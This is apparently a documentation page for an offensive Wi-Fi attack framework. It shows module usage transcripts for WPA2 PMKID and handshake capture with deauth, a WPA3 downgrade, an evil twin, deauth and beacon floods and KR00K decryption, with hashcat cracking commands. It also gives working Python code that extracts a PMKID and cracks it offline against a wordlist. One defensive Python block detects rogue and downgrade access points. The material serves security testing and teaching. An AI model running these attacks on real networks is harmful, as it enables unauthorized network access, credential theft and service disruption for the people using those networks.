WiFi Attacks
Language: Português (pt-BR) | English: Wi-Fi-Attacks
Complete reference for the WPA2, WPA3, WPE/EAPOL and 802.11 attack modules.
| Module | Description |
|---|---|
| wifi_lab/fragattacks | FragAttacks (CVE-2020-24586 to CVE-2020-24588, CVE-2020-26139 to CVE-2020-26147) - see FragAttacks |
| wifi_lab/handshake_snooper | PMKID-first handshake capture pipeline with deauth fallback |
| wifi_lab/wpa3_attack_suite | Dragonblood SAE flood, CSA + harvest, Double SSID, downgrade |
| wifi_lab/auth_flood | Auth/EAPOL flood, amok mode, mesh flood (mdk4 backend) |
| wifi_lab/beacon_flood | Beacon spam with custom SSIDs |
| wifi_lab/evil_twin_workflow | Full evil twin with post-capture verification |
| wifi_lab/captive_portal_modern_lab | Modern captive portal with HTML/JS credential collector |
| wifi_lab/mitm_wifi_bridge | ARP/DNS spoofing + Ghost combo (bettercap) |
| wifi_lab/adaptive_harvest | Score-driven adaptive channel/PMKID harvesting |
| wifi_lab/wardriving_deauth_loop | Automated scan/deauth/capture cycles while wardriving |
| wifi_lab/wireless_ids | Lightweight IDS: BSSID baseline + rogue AP detection |
| wifi_lab/awdl_attack | AWDL/AirDrop (opendrop + owl) - discovery, send, DoS |
| wifi_lab/momo_integrated_attack | KARMA + PMKID-first + downgrade orchestration |
| wifi_lab/research_ecosystem_status | Status of all research submodule integrations |
| wifi_lab/gps_wardriving_ndjson | GPS NMEA -> NDJSON wardriving log |
| wifi_lab/wifi_sniffer | Multi-backend sniffer (tcpdump/scapy/tshark) |
| wifi_lab/wifi_kr00k_cve_2019_15126 | CVE-2019-15126 KR00K: deauth + CCMP decryption with zeroed TK |
```
wxf > use generic/wifi_lab/handshake_snooper
wxf (HandshakeSnooper) > set INTERFACE wlan0mon
wxf (HandshakeSnooper) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (HandshakeSnooper) > run
[*] Starting handshake capture on wlan0mon
[*] Target: AA:BB:CC:DD:EE:FF (HomeWifi) ch6 WPA2-PSK
[*] Attempting PMKID capture (clientless)...
[+] PMKID captured: 4d4f4e4f3a3a3aaabbccddeeff...
[*] Saving to /tmp/capture_AABBCCDDEEFF.pcap
[+] Capture complete. Crack with: hashcat -m 22000 capture.hc22000 rockyou.txt
```
Without a PMKID, the module falls back to capturing the 4-way handshake by forcing a client to reconnect with deauth frames:
```
[*] PMKID not available - attempting deauth + EAPOL capture
[*] Sending 5 deauth frames to force client reconnect...
[*] Monitoring for EAPOL 4-way handshake...
[+] Handshake captured (4-way EAPOL, all 4 messages)
[+] CCMP/TKIP: check with aircrack-ng or hashcat -m 22000
```
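The PMKID branch of this pipeline works because an AP that supports PMKSA caching may put a PMKID KDE into message 1 of the 4-way handshake, and the PMKID is an HMAC over the PMK and the two MAC addresses with no nonces involved, so one frame (and no client) is enough for an offline dictionary attack. The following is an added example written for this page, not the handshake_snooper module's code: it builds a constructed EAPOL-Key message 1 (the passphrase `demo-passphrase-1` and the AP/client MACs are fixture values, not captured traffic), parses the PMKID KDE out of it, writes the hashcat 22000 record, and recomputes the PMKID per candidate the way hashcat does. Note that the `.pcap` saved above has to be converted before the hashcat command shown will run, for example `hcxpcapngtool -o capture.hc22000 /tmp/capture_AABBCCDDEEFF.pcap`.

```python
"""PMKID-first capture pipeline, end to end: parse EAPOL-Key message 1, emit a hashcat
22000 record, and check passphrase candidates offline. Constructed fixture, not real traffic."""
import hashlib
import hmac
import struct

AP_MAC = bytes.fromhex("AABBCCDDEEFF")      # BSSID used in the transcripts above
STA_MAC = bytes.fromhex("112233445566")     # client MAC used in the transcripts above
ESSID = b"HomeWifi"
DEMO_PASSPHRASE = "demo-passphrase-1"      # constructed for this example


def pmk_from_passphrase(passphrase, essid):
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid, 4096, 32)


def pmkid(pmk, ap, sta):
    """802.11 PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA): 16 bytes, no nonces involved."""
    return hmac.new(pmk, b"PMK Name" + ap + sta, hashlib.sha1).digest()[:16]


def build_eapol_msg1(pmkid_value, anonce):
    """Build a minimal EAPOL-Key message 1 (RSN key descriptor) whose Key Data carries a PMKID KDE.
    KDE layout: element id 0xDD, length 20, OUI 00-0F-AC, data type 4, 16-byte PMKID."""
    kde = bytes([0xDD, 0x14, 0x00, 0x0F, 0xAC, 0x04]) + pmkid_value
    key_info = 0x008A  # descriptor version 2 (HMAC-SHA1-128), Pairwise, Ack: message 1 flags
    body = struct.pack(">BHH8s32s16s8s8s16sH",
                       2,                        # descriptor type 2 = RSN Key
                       key_info,
                       16,                       # key length for CCMP
                       (1).to_bytes(8, "big"),   # replay counter
                       anonce,
                       bytes(16), bytes(8), bytes(8),   # IV, RSC, Key ID (unused in msg 1)
                       bytes(16),                # MIC is zero in message 1
                       len(kde)) + kde
    return struct.pack(">BBH", 2, 3, len(body)) + body   # EAPOL version 2, packet type 3 = Key


def extract_pmkid(eapol):
    """Return the PMKID carried in an EAPOL-Key frame's Key Data, or None if there is none."""
    if len(eapol) < 4 or eapol[1] != 3:           # EAPOL packet type 3 = Key
        return None
    body = eapol[4:4 + struct.unpack(">H", eapol[2:4])[0]]
    if len(body) < 95 or body[0] != 2:            # 95-byte fixed part, RSN key descriptor
        return None
    key_data_len = struct.unpack(">H", body[93:95])[0]
    key_data = body[95:95 + key_data_len]
    i = 0
    while i + 2 <= len(key_data):                 # walk the KDE/IE list in Key Data
        eid, elen = key_data[i], key_data[i + 1]
        payload = key_data[i + 2:i + 2 + elen]
        if eid == 0xDD and len(payload) == 20 and payload[:4] == b"\x00\x0f\xac\x04":
            return payload[4:]
        i += 2 + elen
    return None


def to_hc22000(pmkid_value, ap, sta, essid):
    """hashcat mode 22000 PMKID record: WPA*01*PMKID*MAC_AP*MAC_STA*ESSID_HEX*** (last 3 fields empty)."""
    return f"WPA*01*{pmkid_value.hex()}*{ap.hex()}*{sta.hex()}*{essid.hex()}***"


def crack_pmkid(line, wordlist):
    """Offline check: recompute the PMKID for each candidate; return the matching passphrase or None."""
    _, _, target, ap, sta, essid, *_ = line.split("*")
    target, ap, sta, essid = (bytes.fromhex(x) for x in (target, ap, sta, essid))
    for candidate in wordlist:
        if hmac.compare_digest(pmkid(pmk_from_passphrase(candidate, essid), ap, sta), target):
            return candidate
    return None


def demo():
    """Whole pipeline on the constructed fixture: capture -> hc22000 -> dictionary hit."""
    pid = pmkid(pmk_from_passphrase(DEMO_PASSPHRASE, ESSID), AP_MAC, STA_MAC)
    frame = build_eapol_msg1(pid, bytes(range(32)))          # stands in for the sniffed message 1
    line = to_hc22000(extract_pmkid(frame), AP_MAC, STA_MAC, ESSID)
    return crack_pmkid(line, ["password", "letmein", DEMO_PASSPHRASE])


if __name__ == "__main__":
    print(demo())
```

The KDE is optional, which is why the module keeps the deauth path: an AP that does not include it never gives you a clientless capture, and you need message 2 of the real handshake (with its MIC) instead.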
WPA3 uses SAE (Simultaneous Authentication of Equals, also called Dragonfly) instead of deriving the PMK directly from the pre-shared key, so a captured handshake no longer gives an offline dictionary attack. The Dragonblood vulnerabilities enable downgrade and side-channel attacks against WPA3 implementations. The downgrade relies on WPA3 transition mode: a client that knows a network as WPA3 will still accept a rogue AP advertising the same SSID as WPA2-only and complete enough of a WPA2 4-way handshake to yield a crackable capture; the intended mitigation is client-side memory of the negotiated AKM (the Transition Disable indication added to the WPA3 specification). Note that CVE-2019-13377, shown in the module banner below, refers to the Brainpool-curve timing side channel in the hostapd/wpa_supplicant SAE implementation rather than to the downgrade itself.
```
wxf > use generic/wifi_lab/wpa3_attack_suite
wxf (WPA3AttackSuite) > show options
Options:
  INTERFACE     wlan0mon    Monitor mode interface
  TARGET_BSSID  (required)  Target AP BSSID
  ATTACK_TYPE   all         Attack vector (sae_flood, downgrade, double_ssid, csa_harvest)
  SIMULATE      true        Dry-run
wxf (WPA3AttackSuite) > set INTERFACE wlan0mon
wxf (WPA3AttackSuite) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (WPA3AttackSuite) > set ATTACK_TYPE downgrade
wxf (WPA3AttackSuite) > set SIMULATE true
wxf (WPA3AttackSuite) > run
[SIMULATE] WPA3 Downgrade Attack (CVE-2019-13377)
[SIMULATE] Target: AA:BB:CC:DD:EE:FF
[SIMULATE] Creating rogue AP: same SSID (HomeWifi), WPA2-only capability advertisement
[SIMULATE] Sending Channel Switch Announcement (CSA) to move clients to rogue AP
[SIMULATE] Once clients associate to rogue AP, capture WPA2 handshake for cracking
[!] Set SIMULATE=false to run
[!] Requires: wlan0 (managed) + wlan0mon (monitor) + hostapd/dnsmasq
```
```
wxf > use generic/wifi_lab/evil_twin_workflow
wxf (EvilTwin) > set INTERFACE wlan0mon
wxf (EvilTwin) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (EvilTwin) > set TARGET_ESSID HomeWifi
wxf (EvilTwin) > set CHANNEL 6
wxf (EvilTwin) > set SIMULATE true
wxf (EvilTwin) > run
[SIMULATE] Evil Twin Workflow
[SIMULATE] Phase 1: Deauth all clients from AA:BB:CC:DD:EE:FF (HomeWifi) ch6
[SIMULATE] Phase 2: Start rogue AP: SSID=HomeWifi, channel=6, OPEN (captive)
[SIMULATE] Phase 3: DHCP + DNS server on rogue AP
[SIMULATE] Phase 4: Monitor for client associations
[SIMULATE] Phase 5: Capture WPA2 handshake when client retries real AP
[SIMULATE] - Verify captured handshake against captured clients
[SIMULATE] - Export for aircrack-ng / hashcat
[!] Set SIMULATE=false
[!] PREREQ: hostapd + dnsmasq installed
```
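Both the WPA3 downgrade above and the open evil twin hinge on the same observable: a second AP announcing a known SSID with weaker security than the baseline (PSK-only where the real AP offers SAE, or no RSN element at all). The following is an added example written for this page, not the code of the wpa3_attack_suite, evil_twin_workflow or wireless_ids modules. It parses the SSID and RSN elements from the tagged-parameter area of a beacon or probe response, compares them with a baseline learned from the legitimate AP, and classifies the frame. The beacon blobs are constructed in the block; the selector values are the 802.11 ones (OUI 00-0F-AC with type 2 = PSK, 8 = SAE, 4 = CCMP-128), and the baseline dictionary shape is this example's own convention.

```python
"""Baseline-vs-observed beacon check for the downgrade and evil-twin patterns above:
parse SSID and RSN elements, compare with the known AP, classify. Constructed frames."""
import struct

OUI_IEEE = b"\x00\x0f\xac"
AKM_PSK, AKM_SAE = 2, 8          # RSN AKM suite selectors 00-0F-AC:2 (PSK) and 00-0F-AC:8 (SAE)
CIPHER_CCMP = 4                  # pairwise/group cipher selector 00-0F-AC:4


def ssid_ie(ssid):
    """Element 0: SSID."""
    s = ssid.encode()
    return bytes([0, len(s)]) + s


def rsn_ie(akms, pairwise=(CIPHER_CCMP,), group=CIPHER_CCMP, caps=0):
    """Element 48: RSN. version=1, group suite, pairwise list, AKM list, capabilities.
    Counts and capabilities are little-endian; caps 0x80 = MFPC, 0xC0 = MFPC|MFPR."""
    body = struct.pack("<H", 1) + OUI_IEEE + bytes([group])
    body += struct.pack("<H", len(pairwise)) + b"".join(OUI_IEEE + bytes([p]) for p in pairwise)
    body += struct.pack("<H", len(akms)) + b"".join(OUI_IEEE + bytes([a]) for a in akms)
    body += struct.pack("<H", caps)
    return bytes([48, len(body)]) + body


def parse_ies(tagged):
    """Walk the tagged-parameter area of a beacon/probe response.
    Returns {"ssid", "rsn" (bool), "akms" (set of selector types), "pairwise" (set)}."""
    info = {"ssid": None, "rsn": False, "akms": set(), "pairwise": set()}
    i = 0
    while i + 2 <= len(tagged):
        eid, elen = tagged[i], tagged[i + 1]
        payload = tagged[i + 2:i + 2 + elen]
        if eid == 0:
            info["ssid"] = payload.decode("utf-8", "replace")
        elif eid == 48:
            info["rsn"] = True
            try:
                pos = 6                                       # version(2) + group cipher suite(4)
                (n_pair,) = struct.unpack_from("<H", payload, pos); pos += 2
                for _ in range(n_pair):
                    if payload[pos:pos + 3] == OUI_IEEE:
                        info["pairwise"].add(payload[pos + 3])
                    pos += 4
                (n_akm,) = struct.unpack_from("<H", payload, pos); pos += 2
                for _ in range(n_akm):
                    if payload[pos:pos + 3] == OUI_IEEE:
                        info["akms"].add(payload[pos + 3])
                    pos += 4
            except (struct.error, IndexError):
                info["rsn_malformed"] = True                  # truncated RSN element
        i += 2 + elen
    return info


def classify(baseline, bssid, tagged):
    """baseline: {ssid: {"bssid": "aa:bb:...", "akms": set}} learned from the legitimate network.
    Returns: ok | unknown-ssid | malformed-rsn | open-twin | downgrade-twin | unknown-bssid."""
    seen = parse_ies(tagged)
    known = baseline.get(seen["ssid"])
    if known is None:
        return "unknown-ssid"
    if seen.get("rsn_malformed"):
        return "malformed-rsn"
    if bssid.lower() == known["bssid"].lower() and seen["akms"] == known["akms"]:
        return "ok"
    if not seen["rsn"]:
        return "open-twin"              # a protected SSID now offered with no RSN element
    if AKM_SAE in known["akms"] and AKM_SAE not in seen["akms"]:
        return "downgrade-twin"         # SAE dropped: the WPA3 transition-mode downgrade pattern
    return "unknown-bssid"              # same SSID and security, different BSSID


def demo():
    """Legit transition-mode AP, a WPA2-only rogue and an open rogue, all for SSID HomeWifi."""
    baseline = {"HomeWifi": {"bssid": "AA:BB:CC:DD:EE:FF", "akms": {AKM_PSK, AKM_SAE}}}
    legit = ssid_ie("HomeWifi") + rsn_ie((AKM_PSK, AKM_SAE), caps=0x80)
    rogue_wpa2 = ssid_ie("HomeWifi") + rsn_ie((AKM_PSK,))
    rogue_open = ssid_ie("HomeWifi")
    observed = [("AA:BB:CC:DD:EE:FF", legit), ("02:11:22:33:44:55", rogue_wpa2),
                ("02:11:22:33:44:56", rogue_open)]
    return [classify(baseline, b, t) for b, t in observed]


if __name__ == "__main__":
    print(demo())
```

A same-BSSID rogue (one that spoofs the real AP's MAC) still lands in `downgrade-twin` or `open-twin`, because the AKM comparison runs before the BSSID match is trusted; the BSSID alone is never the deciding signal.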
```
wxf > use generic/wifi_lab/auth_flood
wxf (AuthFlood) > set INTERFACE wlan0mon
wxf (AuthFlood) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (AuthFlood) > set MODE deauth
wxf (AuthFlood) > set SIMULATE true
wxf (AuthFlood) > run
[SIMULATE] Deauth flood against AA:BB:CC:DD:EE:FF
[SIMULATE] Frames: 100/s, broadcast client (FF:FF:FF:FF:FF:FF), reason 0x07
[!] Set SIMULATE=false to run
[!] PREREQ: wlan0mon in monitor mode on same channel as target
```
```
wxf > use generic/wifi_lab/beacon_flood
wxf (BeaconFlood) > set INTERFACE wlan0mon
wxf (BeaconFlood) > set SSID_COUNT 500
wxf (BeaconFlood) > set CHANNEL 6
wxf (BeaconFlood) > set SIMULATE true
wxf (BeaconFlood) > run
[SIMULATE] Beacon flood: 500 unique SSIDs on channel 6
[SIMULATE] Rotates SSIDs and MACs to avoid deduplication
[SIMULATE] Approx rate: 50 beacons/s
[!] Set SIMULATE=false (uses mdk4 backend)
[!] PREREQ: mdk4 installed
```
KR00K affects Broadcom and Cypress 802.11 chips. After a disassociation (which an attacker can trigger with an unauthenticated deauth frame), the chip zeroes its TK (Temporal Key) but still transmits the data frames left in its buffer, now encrypted with the all-zero key, so those frames can be decrypted without knowing the WPA2 passphrase. Only the frames that were buffered at the moment of disassociation leak; traffic after the client reconnects is encrypted under a fresh TK as usual.
```
wxf > use generic/wifi_lab/wifi_kr00k_cve_2019_15126
wxf (KR00K) > show info
Name: KR00K Unauthenticated CCMP Decryption
CVE: CVE-2019-15126
CVSS: 6.5 (Medium)
Target: Devices with Broadcom BCM4375, BCM4389 or Cypress CYW43xx chips
        (includes many iPhones, MacBooks, Kindles, Raspberry Pi, many routers)
Auth: None required (attacker just needs to be in WiFi range)
Description:
  After receiving a deauth frame, the affected chip clears the TK to all zeros
  but continues to transmit buffered frames using the zeroed key.
  These frames can be trivially decrypted by an observer.
  Exposes partial network traffic including DNS queries, HTTP requests, etc.
wxf (KR00K) > set INTERFACE wlan0mon
wxf (KR00K) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (KR00K) > set TARGET_STA 11:22:33:44:55:66
wxf (KR00K) > set SIMULATE true
wxf (KR00K) > run
[SIMULATE] CVE-2019-15126 KR00K
[SIMULATE] Step 1: Send deauth to 11:22:33:44:55:66 from AA:BB:CC:DD:EE:FF
[SIMULATE] Step 2: Capture frames transmitted immediately after deauth
[SIMULATE] Expected: buffered frames encrypted with TK=00:00:00:00:...
[SIMULATE] Step 3: Decrypt captured frames with all-zeros CCMP key
[SIMULATE] Potential exposure: last 5-15 seconds of buffered traffic
[!] Set SIMULATE=false to run
[!] PREREQ: wlan0mon on target channel
[!] NOTE: Affects many common devices from 2016-2019, patched in 2020
```
```
wxf > use generic/pcap/pcap_handshake_extractor
wxf (PCAPHandshakeExtractor) > set PCAP_FILE /captures/office.pcap
wxf (PCAPHandshakeExtractor) > run
[*] Analyzing /captures/office.pcap...
[+] Handshake found: AA:BB:CC:DD:EE:FF (HomeWifi) - 4-way EAPOL complete
[+] Handshake found: 11:22:33:44:55:66 (GuestNet) - partial (msg1,2 only)
[+] PMKID found: FF:EE:DD:CC:BB:AA (OfficeWifi)
[*] Exported: /captures/office_handshakes.hc22000
[*] Crack: hashcat -m 22000 /captures/office_handshakes.hc22000 rockyou.txt
```
Related pages: FragAttacks | KRACK | Bluetooth and BLE
Author: André Henrique (@mrhenrike) | União Geek